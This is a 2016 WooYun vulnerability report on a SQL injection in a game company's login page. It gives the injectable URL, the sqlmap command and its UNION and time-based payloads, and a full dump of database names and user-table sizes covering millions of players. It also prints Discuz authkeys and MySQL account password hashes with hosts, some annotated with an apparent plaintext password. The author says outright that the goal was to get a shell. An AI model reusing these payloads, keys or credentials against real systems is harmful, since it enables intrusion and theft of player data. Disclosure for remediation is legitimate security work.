当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0213350

漏洞标题:游戏安全之欢畅游戏官网SQL注入/涉及600万玩家手机邮箱帐号密码安全

相关厂商:ourpalm.com

漏洞作者: 我在不想理你

提交时间:2016-05-27 11:31

修复时间:2016-07-11 15:00

公开时间:2016-07-11 15:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-27: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已经确认,细节仅向厂商公开
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

shell不了好悲伤

详细说明:

在登录游戏的时候有注入点,UNION

http://long.gamebean.com/game_enter.php?s_id=1


跑sqlmap

sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.4.4#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:59:19
[09:59:19] [INFO] resuming back-end DBMS 'mysql' 
[09:59:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- -
---
[09:59:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.12
[09:59:23] [INFO] fetching database names
[09:59:23] [INFO] the SQL query used returns 24 entries
available databases [24]:                                                                                                                                                           
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws


涉及全站24个库

漏洞证明:

其中bbs库和user库和ssfee_platform推广平台库里面有200W+450W+560W用户帐号密码手机邮箱信息,去重后大约有600W用户

Database: bbs
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| uc_memberfields      | 1980846 |
| uc_members           | 1980846 |
| cdb_favoritethreads  | 46470   |
| cdb_prompt           | 21412   |
| cdb_memberfields     | 18489   |
| cdb_members          | 18488   |
| cdb_posts            | 9945    |
| cdb_onlinetime       | 8183    |
| cdb_threads          | 3357    |
| uchome_creditlog     | 1660    |
| cdb_promptmsgs       | 1321    |
| uchome_pic           | 1320    |
| uchome_tagblog       | 1118    |
| uc_pms               | 1095    |
| cdb_threadsmod       | 709     |
| cdb_modworks         | 666     |
| cdb_rsscaches        | 651     |
| uchome_blog          | 502     |
| uchome_blogfield     | 502     |
| uchome_member        | 483     |
| uchome_space         | 483     |
| uchome_spacefield    | 483     |
| uchome_album         | 464     |
| uchome_feed          | 425     |
| cdb_threadtags       | 340     |
| uchome_spaceinfo     | 320     |
| cdb_stylevars        | 282     |
| uchome_stat          | 245     |
| cdb_settings         | 244     |
| cdb_tags             | 243     |
| uchome_tag           | 209     |
| uchome_friend        | 126     |
| uchome_usertask      | 96      |
| cdb_smilies          | 80      |
| cdb_statvars         | 73      |
| uc_newpm             | 66      |
| cdb_typeoptions      | 65      |
| uchome_notification  | 65      |
| uchome_config        | 64      |
| uchome_comment       | 62      |
| cdb_forumfields      | 55      |
| cdb_forums           | 55      |
| cdb_stats            | 52      |
| uchome_creditrule    | 47      |
| cdb_spacecaches      | 42      |
| cdb_caches           | 41      |
| uc_notelist          | 38      |
| cdb_faqs             | 34      |
| uchome_visitor       | 32      |
| cdb_request          | 30      |
| uc_friends           | 29      |
| cdb_debateposts      | 28      |
| cdb_favorites        | 28      |
| cdb_favoriteforums   | 25      |
| uchome_magic         | 25      |
| cdb_magiclog         | 24      |
| uc_settings          | 24      |
| uchome_doing         | 24      |
| uchome_magicstore    | 24      |
| uchome_poke          | 22      |
| uchome_magicinlog    | 21      |
| uchome_post          | 21      |
| uchome_usermagic     | 21      |
| uchome_polloption    | 20      |
| uchome_thread        | 20      |
| cdb_usergroups       | 19      |
| cdb_failedlogins     | 18      |
| uchome_share         | 18      |
| cdb_moderators       | 17      |
| uchome_click         | 15      |
| cdb_ratelog          | 14      |
| cdb_taskvars         | 14      |
| cdb_crons            | 12      |
| cdb_forumlinks       | 12      |
| cdb_magics           | 12      |
| cdb_projects         | 11      |
| cdb_reportlog        | 11      |
| uchome_magicuselog   | 10      |
| cdb_words            | 9       |
| uchome_usergroup     | 9       |
| cdb_admingroups      | 7       |
| cdb_polloptions      | 7       |
| cdb_tasks            | 7       |
| uchome_task          | 7       |
| cdb_access           | 6       |
| cdb_feeds            | 6       |
| cdb_prompttype       | 6       |
| cdb_styles           | 6       |
| cdb_templates        | 6       |
| uchome_eventclass    | 6       |
| uchome_mtag          | 6       |
| uchome_polluser      | 6       |
| uchome_tagspace      | 6       |
| cdb_attachments      | 5       |
| cdb_navs             | 5       |
| cdb_ranks            | 5       |
| uchome_cron          | 5       |
| cdb_admincustom      | 4       |
| cdb_bbcodes          | 4       |
| cdb_onlinelist       | 4       |
| cdb_searchindex      | 4       |
| cdb_typemodels       | 4       |
| uchome_data          | 4       |
| uchome_poll          | 4       |
| uchome_pollfield     | 4       |
| cdb_imagetypes       | 3       |
| cdb_warnings         | 3       |
| uc_applications      | 3       |
| uchome_class         | 3       |
| uchome_profield      | 3       |
| uchome_report        | 3       |
| uchome_statuser      | 3       |
| cdb_addons           | 2       |
| cdb_debates          | 2       |
| cdb_polls            | 2       |
| cdb_adminactions     | 1       |
| cdb_adminsessions    | 1       |
| cdb_attachmentfields | 1       |
| uc_admins            | 1       |
| uc_failedlogins      | 1       |
| uc_protectedmembers  | 1       |
+----------------------+---------+


Database: user
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| channel_extend     | 12501938 |
| members_info       | 4550839 |
| members_0          | 650074  |
| members_6          | 648069  |
| members_4          | 647573  |
| members_8          | 646946  |
| members_2          | 646486  |
| members_7          | 640523  |
| members_5          | 640124  |
| members_3          | 638772  |
| members_1          | 638475  |
| members_9          | 638271  |
| members_football   | 66598   |
| membersinfo_0      | 29646   |
| membersinfo_6      | 29350   |
| membersinfo_4      | 29293   |
| membersinfo_5      | 29186   |
| membersinfo_2      | 29133   |
| membersinfo_8      | 29063   |
| membersinfo_3      | 28919   |
| membersinfo_7      | 28804   |
| membersinfo_1      | 28781   |
| membersinfo_9      | 28705   |
| footballuser_copy1 | 21563   |
| members_point      | 20073   |
| members_fmworlds   | 5047    |
| zq_point           | 2703    |
| a                  | 1355    |
| footballuser       | 1000    |
| invite             | 25      |
| partner            | 11      |
+--------------------+---------+


Database: ssfee_platform
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| p_user_ip                     | 6538408 |
| user_info_201112              | 5643243 |
| user_info                     | 3971775 |
| p_area                        | 2869631 |
| advt_stat_hour_201201TO06     | 2474046 |
| user_info_201102              | 2234956 |
| register_after                | 1738043 |
| advt_stat_hour                | 1559224 |
| advt_stat_channel             | 1082289 |
| advt_stat_hour_201101TO07     | 1069454 |
| u_ip                          | 376052  |
| advt_stat_hour_201101TO02     | 344281  |
| jiaose_sssg                   | 186520  |
| temp4                         | 139504  |
| advt_stat_ye                  | 117002  |
| advt_stat_hour_20108TO10      | 101229  |
| p_area_Integration            | 57078   |
| temp2                         | 56822   |
| p_newsbase_201206             | 49845   |
| p_ip                          | 45309   |
| advt_stat_nq                  | 43122   |
| p_area_Integration_ip         | 25881   |
| seek_gateway_fee              | 24020   |
| p_area_register               | 21292   |
| seek_gateway_fee_bak          | 19978   |
| wapgame_zhuce                 | 19034   |
| jiaose_long                   | 16060   |
| user_info_mj                  | 11834   |
| sms_fee                       | 7404    |
| temp3                         | 4679    |
| get_user                      | 4035    |
| wapgame_fee                   | 3921    |
| wapgame_fee_bak               | 3626    |
| p_newsbase_tmp                | 3421    |
| pc_jiaose                     | 3134    |
| user_stat                     | 2809    |
| p_ad_info                     | 2590    |
| seek_gateway_chengben         | 2381    |
| seek_gateway_chengben_bak     | 2368    |
| p_user_ip_copy                | 2355    |
| wapgame_fee_201109            | 2355    |
| sms_fee1                      | 1772    |
| jiaose_yan                    | 1096    |
| p_newscontent                 | 966     |
| wapgame_zhuce_tmp             | 927     |
| p_ad                          | 895     |
| p_area_Integration_copy       | 742     |
| lm_info                       | 704     |
| p_newsbase                    | 665     |
| haoduan_ds                    | 345     |
| bd                            | 295     |
| bd2                           | 295     |
| lm_info_test                  | 288     |
| netgame_stat                  | 243     |
| temp                          | 216     |
| seek_gateway_fee_tmp1         | 154     |
| p_area_Integration_ip_copy2   | 132     |
| p_area_Integration_ip_copy1   | 118     |
| p_area_Integration_ip_ddd     | 118     |
| p_area_Integration_test_copy1 | 116     |
| baidu                         | 112     |
| wapgame_fee_tmp               | 101     |
| p_user_ip_are                 | 99      |
| seek_gateway_fee_g9           | 92      |
| kuapintai_fee                 | 91      |
| jiaose_ly                     | 70      |
| u_manage                      | 68      |
| advt_stat_tmp                 | 62      |
| seek_gateway_fee_tmp          | 62      |
| seek_gateway_fee_lr           | 60      |
| u_admin                       | 60      |
| netgame_stat_tmp              | 49      |
| sms_fee2                      | 48      |
| p_area_Integration_ip_copy    | 36      |
| sms_fee3                      | 24      |
| seek_gateway_chengben_lr      | 17      |
| u_group                       | 15      |
| seek_gateway_chengben_tmp     | 14      |
| wapgame_fee_bf2015            | 12      |
| p_user_ip_tmp                 | 10      |
| data_manage                   | 9       |
| p_newsclass                   | 9       |
| wapgame_qudao                 | 9       |
| p_admin                       | 6       |
| p_area_Integration_test_copy  | 6       |
| seek_gateway_xz               | 6       |
| data_admin                    | 4       |
| jiaose_djh                    | 4       |
| yuan                          | 4       |
| data_group                    | 2       |
| p_adver_admin                 | 2       |
| ios_xml                       | 1       |
| p_config                      | 1       |
+-------------------------------+---------+


以及泄漏discuz的uckey

Database: bbs
Table: uc_applications
[3 entries]
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| appid | ip      | url                       | name       | type   | extra                       | charset | authkey                                                          | recvnote | synlogin | dbcharset | viewprourl | apifilename | tagtemplates                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1     | <blank> | http://219.232.240.2/home | 个人家园       | UCHOME | <blank>                     | utf-8   | F0q1C5wclbJcieF6i6F03d3eDd37V4K10aG6y5I7qeEd97mcN3b3t43a21UfGai6 | 1        | 1        | utf8      | <blank>    | uc.php      | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[日志标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[用户名]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="spaceurl"><![CDATA[空间地址]]></item>\r\n <item id="url"><![CDATA[日志地址]]></item>\r\n </item>\r\n</root> |
| 2     | <blank> | http://219.232.240.2/bbs  | Discuz!    | DISCUZ | <blank>                     | utf-8   | P221cb87c9h7a0s7v8b533eeL0X939dfQ9uc16K7b4Ieh6U1Wbg0X2h3K3S854v4 | 1        | 1        | utf8      | <blank>    | uc.php      | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[发帖者]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="url"><![CDATA[主题地址]]></item>\r\n </item>\r\n</root>                                                   |
| 3     | <blank> | http://www.gamebean.com   | gamebean门户 | OTHER  | a:1:{s:7:"apppath";s:0:"";} | <blank> | b1f3g6Fp/bNb5b5yiaD0/DlK2j4ZoEv5FxmjqvbMU4uHv/6+Xj2l9pU          | 0        | 0        | <blank>   | <blank>    | uc.php      | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[]]></item>\r\n</root>                                                                                                                                                                                                                                                                                                                                                                    |
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+


getshell不了
数据库密码

Database: mysql
Table: user
[39 entries]
+--------------+-------------------------------------------+---------------+
| user         | password                                  | host          |
+--------------+-------------------------------------------+---------------+
| root         | *4B40B8C66CD7F7380E398A0CEBE5C6F388DD2995 | localhost     |
| admin        | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | 127.0.0.1     |
| root         | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | %             |mysql228
| cctv         | *9B91D3DD2A6DF0D4BD53BB9716EA231BE173D7B2 | %             |
| channel      | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | %             |mysql228
| rsync        | *B8275A0D97CC0A636920525D16CD8F2FFE137971 | %             |
| test         | *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29 | %             |
| gamebean     | *9D7CD5A312DB9732C250F6009DC97C4027846EDD | %             |
| wapgame      | *028E35F5FDD9A172849C808EBE9A45938A3571E4 | %             |
| slave        | *093D835F112A3BCBA1C39EFEFD1ADF934EEB2C8A | %             |
| repl         | *3028A46C5F893BB70BFAA40E5F0C90F8BAD8E07A | %             |
| bbs          | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | %             |mysql228
| cms          | *0DBB9DEC9800F895124E2D292E12D2CBE5565C58 | %             |
| huawb        | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | %             |
| wangdy       | *BE0BC36D760FFE1627F567894CE8EA4F692E819A | %             |
| huawbtg      | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | %             |
| zuol         | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | %             |
| backup       | *1827DC630AAEB1E997DB2B212CC94EFD9C431555 | 114.112.69.51 |
| huawb        | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 |
| huawb        | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 |
| huawbtg      | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 |
| huawbtg      | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 |
| dbbackup     | *B8EA50B347976D08DBA6AFF751926429A04881EF | 172.16.%      |
| wangyf       | *4BE66E5176633B8101188EE0272832E033EA48F1 | %             |
| bxb          | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | %             |
| gamebean_web | *54D36154FCBD065DFE7269E85C135EDB0DC715B8 | 219.232.240.2 |
| root_backup  | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 172.16.10.88  |mysql228
| qingjingli   | *773E83E4FDE66994A6E5A4948E27332A199A157E | %             |
| backup       | *3584A73767611418363012358FAFC887749A25E7 | 113.31.91.159 |
| admin        | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | localhost     |
| nagios       | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 172.16.108.%  |
| mysqld       | *B3500AC7C3F7205937036E78E40C103832F68BE6 | localhost     |
| dbbackup     | *B8EA50B347976D08DBA6AFF751926429A04881EF | 127.0.0.1     |
| root         | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 127.0.0.1     |mysql228
| dbbackup     | *B8EA50B347976D08DBA6AFF751926429A04881EF | %             |
| nagios       | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.6 |
| nagios       | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.2 |
| nagios       | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 113.31.91.159 |
| nagios       | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | %             |
+--------------+-------------------------------------------+---------------+


找不到服务器ip
还是shell不了呀 哎

修复方案:

过滤sql

版权声明:转载请注明来源 我在不想理你@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-05-27 14:58

厂商回复:

感谢对欢畅游戏安全问题的反馈

最新状态:

暂无